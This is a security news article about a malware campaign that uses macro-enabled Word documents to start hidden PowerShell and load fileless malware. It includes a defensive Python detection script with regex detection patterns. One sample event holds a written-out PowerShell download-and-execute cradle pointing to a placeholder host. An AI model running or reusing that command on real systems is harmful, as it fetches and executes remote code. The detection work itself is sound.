Macro-Enabled MS Word Docs and PowerShell Scripts Used in Rash of Undetectable Malware
Malware creators are always on the hunt for new methods to compromise computers and attack them in ways that undermine the ability to detect and remove such threats. In the latest accomplishments of computer hackers and cybercrooks, macro-enabled MS Word documents and Windows PowerShell are being combined to deliver fileless malware.
Cybercrooks and malware creators are now paying special attention to the work of their peers and to what the cybersecurity community is doing to combat emerging threats. With that information in hand, malware peddlers can leverage macro-enabled MS Word documents and PowerShell to spread malware. The technique itself isn't entirely new, but this campaign is the first time we have seen it used in the wild primarily to evade detection.
The security researchers from Palo Alto Networks made the discovery of the campaign and had only detected about 1,500 spam emails using the technique of spreading malware through macro-enabled Word documents and Windows PowerShell files as attachments.
There is a certain irony when it comes to macro-enabled Word documents containing malware. If you think back, or research much older malware threats and computer viruses, you will stumble upon instances, possibly over ten years ago, where threats were spread through Word macros. As it turns out, malware creators have not entirely abandoned their old idea: what was old is new again, only now the malicious macro-enabled Word docs execute automatically when the document is opened on MS Office installs where Word macros are turned on.
Researchers from Palo Alto Networks report that the infected macro Word files used in the new campaign are able to start a hidden instance of Windows PowerShell and download malicious scripts that are then executed by that PowerShell process. PowerShell is a powerful scripting language that Microsoft introduced alongside Windows 7. The scripts support both 32-bit and 64-bit platforms, thus covering a wide variety of systems. The scripts are also sophisticated enough to check that the computer is not a virtual machine, is not running debugging tools, and is not a system used in an educational or hospital environment.
The many checks and tests performed by this new wave of macro-enabled Word document malware demonstrate its newfound sophistication, in an attempt not only to evade detection and removal but to infect only the systems it is targeting.
Spilling the fine details about the latest macro-enabled Word document malware, Palo Alto Networks has also concluded that the threat is written directly into a computer's memory without ever touching the hard drive. Once running, the scripts fetch instructions from the C&C (Command and Control) servers to determine which family of malware to download and install next.
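The infection chain described above (an Office document spawning a hidden PowerShell process that pulls a script straight into memory) leaves a telltale parent/child relationship in process-creation telemetry even when nothing is written to disk. The following is an added example of detection logic, not code from the article or from Palo Alto Networks: it triages constructed process-creation events in a key="value" format loosely modelled on Sysmon event ID 1 fields, flags Office parents that launch a script host, and scores the command line for traits typical of a hidden, download-and-execute launch. The sample event lines, field names and thresholds are assumptions made for the example.

```python
import re
from dataclasses import dataclass

# Office processes that should rarely, if ever, launch a script interpreter.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Command-line traits consistent with a hidden, memory-only launch (ordered: output order matters).
SUSPICIOUS_FLAGS = [
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"-nop(rofile)?\b", re.I), "no profile"),
    (re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression", re.I),
     "download/execute cradle"),
]

# Constructed sample telemetry (not real captures); hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    r'ParentImage="C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" '
    r'Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'CommandLine="powershell.exe -nop -w hidden -ep bypass -c IEX (New-Object Net.WebClient).DownloadString(\'http://stage.example.invalid/s.ps1\')"',
    r'ParentImage="C:\Windows\explorer.exe" '
    r'Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'CommandLine="powershell.exe -File C:\Scripts\backup.ps1"',
    r'ParentImage="C:\Program Files\Microsoft Office\Office15\EXCEL.EXE" '
    r'Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'CommandLine="powershell.exe -Command Get-Date"',
]


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def parse_event(line: str) -> ProcessEvent:
    """Parse one key="value" event line into a ProcessEvent (missing keys become empty strings)."""
    fields = dict(re.findall(r'(\w+)="([^"]*)"', line))
    return ProcessEvent(fields.get("ParentImage", ""), fields.get("Image", ""), fields.get("CommandLine", ""))


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(event: ProcessEvent) -> list:
    """Return the reasons an event looks like an Office-spawned script launch; empty list if benign."""
    reasons = []
    parent, child = basename(event.parent_image), basename(event.image)
    if parent in OFFICE_PARENTS and child in SHELL_CHILDREN:
        reasons.append(f"{parent} spawned {child}")
        for pattern, label in SUSPICIOUS_FLAGS:
            if pattern.search(event.command_line):
                reasons.append(label)
    return reasons


def triage(lines: list) -> list:
    """Map each event line to (reasons, verdict): 'alert' with corroborating flags, 'review' for the
    bare parent/child relationship, 'benign' otherwise."""
    results = []
    for line in lines:
        reasons = assess(parse_event(line))
        verdict = "alert" if len(reasons) >= 2 else "review" if reasons else "benign"
        results.append((reasons, verdict))
    return results


if __name__ == "__main__":
    for (reasons, verdict), line in zip(triage(SAMPLE_EVENTS), SAMPLE_EVENTS):
        print(f"{verdict:7} {parse_event(line).command_line[:60]}  {reasons}")
```

The parent/child pairing alone is worth a look (an Excel sheet running `Get-Date` is unusual but explainable), while the combination of an Office parent with a hidden window, no profile and a download cradle is what the article's campaign looks like in telemetry. Pairing this with PowerShell script block logging closes the gap for payloads that never reach disk.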
So far, the campaign using macro-enabled Word documents to spread malware has mostly targeted computers located in the US, Canada, Austria, Germany, France, Poland, and the UK. As the threats make their rounds, we expect this malicious concoction to reach other countries around the world, especially considering the threat's ability to evade detection and cleverly narrow its targeting.